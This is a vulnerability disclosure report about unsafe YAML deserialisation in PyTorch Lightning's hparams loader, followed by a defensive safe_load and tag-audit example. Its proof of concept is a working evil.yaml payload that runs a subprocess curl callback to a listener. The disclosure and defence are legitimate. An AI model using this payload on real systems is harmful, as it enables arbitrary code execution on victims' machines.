huntr report 31832F0C-E5BB-4552-A12C-542F81F111E6
Reported by oivrip, Dec 12, 2021 - 8:29 p.m. (2021-12-12 20:29:05)
in pytorchlightning/pytorch-lightning
www.huntr.dev

EPSS: 0.001 (Low), percentile 33.3%

Description

There is an untrusted YAML deserialization vulnerability in the PyTorch Lightning GitHub repository. PyTorch Lightning's saving.py (core.saving.load_hparams_from_yaml) parses the file with "yaml.UnsafeLoader" from the PyYAML library, which is not a secure loader: it honours tags that construct arbitrary Python objects from the document. Because of that, a maliciously crafted YAML config file can cause code execution on the victim's machine.

Proof of Concept

  • Here is the poc.py file:
from pytorch_lightning import core
core.saving.load_hparams_from_yaml("evil.yaml")
  • Here is the evil.yaml file:
- !!python/object/new:yaml.MappingNode
  listitems: !!str '!!python/object/apply:subprocess.Popen [["curl", "127.0.0.1:8080/rce"]]'
  state:
    tag: !!str dummy
    value: !!str dummy
    extend: !!python/name:yaml.unsafe_load
  • After that, you need to start an HTTP server on port 8080 of your attacker machine. Once it is running, you will see the HTTP request from the victim host that the malicious YAML file triggers.
python3 -m http.server 8080
  • Run the poc.py file; after that you will see the HTTP request coming from the victim host.
python3 poc.py

Impact

A maliciously crafted YAML config file can cause code execution on the victim's machine.
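The root cause named in the description is the loader choice: yaml.UnsafeLoader constructs whatever the !!python/* tags in the document ask for. The following is an added example, not code from PyTorch Lightning or from the reporter, showing the hardened pattern a maintainer or consumer would use instead: parse hparams with yaml.SafeLoader, which has no constructor for any !!python/* tag and therefore rejects the whole tag family the payload above relies on, plus a tag audit built on yaml.compose that inspects the node graph without constructing any object. The function names (find_python_tags, load_hparams_safely) and the two sample hparams documents are constructed for this example and are not part of the project.

```python
"""Added example (not PyTorch Lightning's code): load a hparams YAML
document without giving it the power to instantiate Python objects.

The vulnerable pattern the advisory describes is, in effect:
    yaml.load(fh, Loader=yaml.UnsafeLoader)
UnsafeLoader resolves tags like !!python/object/apply:... into calls;
SafeLoader has no constructor for any !!python/* tag and refuses them.
"""
import yaml

# "!!python/" is shorthand for this full tag prefix once the document is parsed.
PYTHON_TAG_PREFIX = "tag:yaml.org,2002:python/"


def find_python_tags(text: str) -> list:
    """Audit helper (hypothetical name): walk the composed node graph and
    return every !!python/* tag found. yaml.compose only builds nodes, it
    never constructs objects, so this is safe to run on untrusted input."""
    root = yaml.compose(text, Loader=yaml.SafeLoader)
    found = []
    stack = [root] if root is not None else []
    while stack:
        node = stack.pop()
        if node.tag.startswith(PYTHON_TAG_PREFIX):
            found.append(node.tag)
        if isinstance(node, yaml.MappingNode):
            for key_node, value_node in node.value:
                stack.append(key_node)
                stack.append(value_node)
        elif isinstance(node, yaml.SequenceNode):
            stack.extend(node.value)
    return found


def load_hparams_safely(text: str) -> dict:
    """Hardened replacement for the UnsafeLoader call: only plain YAML
    scalars, sequences and mappings are ever built. Returns a dict."""
    try:
        data = yaml.safe_load(text)
    except yaml.constructor.ConstructorError as exc:
        # SafeLoader stops at the first tag it has no constructor for,
        # which covers every !!python/* tag, including object/apply.
        raise ValueError(f"refused untrusted YAML tag: {exc.problem}") from exc
    if data is None:
        return {}
    if not isinstance(data, dict):
        raise ValueError("hparams document must be a mapping at top level")
    return data


# Constructed sample: the kind of hparams file load_hparams_from_yaml reads.
BENIGN_HPARAMS = """\
learning_rate: 0.001
batch_size: 32
optimizer: adam
"""

# Constructed sample with harmless !!python/* tags. UnsafeLoader would turn
# these into Python objects; the same tag family is what the advisory's
# payload abuses, so a safe loader must reject every member of it.
TAGGED_HPARAMS = """\
learning_rate: 0.001
input_shape: !!python/tuple [3, 224, 224]
reducer: !!python/name:builtins.max
"""

if __name__ == "__main__":
    print(load_hparams_safely(BENIGN_HPARAMS))
    print(find_python_tags(TAGGED_HPARAMS))
    try:
        load_hparams_safely(TAGGED_HPARAMS)
    except ValueError as err:
        print(err)
```

The audit function is the useful extra for defenders: it can be run over a directory of checkpoints or configs pulled from an untrusted source to flag any document carrying Python tags before a loader, safe or not, ever sees it. For the loading path itself, yaml.safe_load is the whole fix; hyperparameters are plain scalars and containers and never need object construction.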
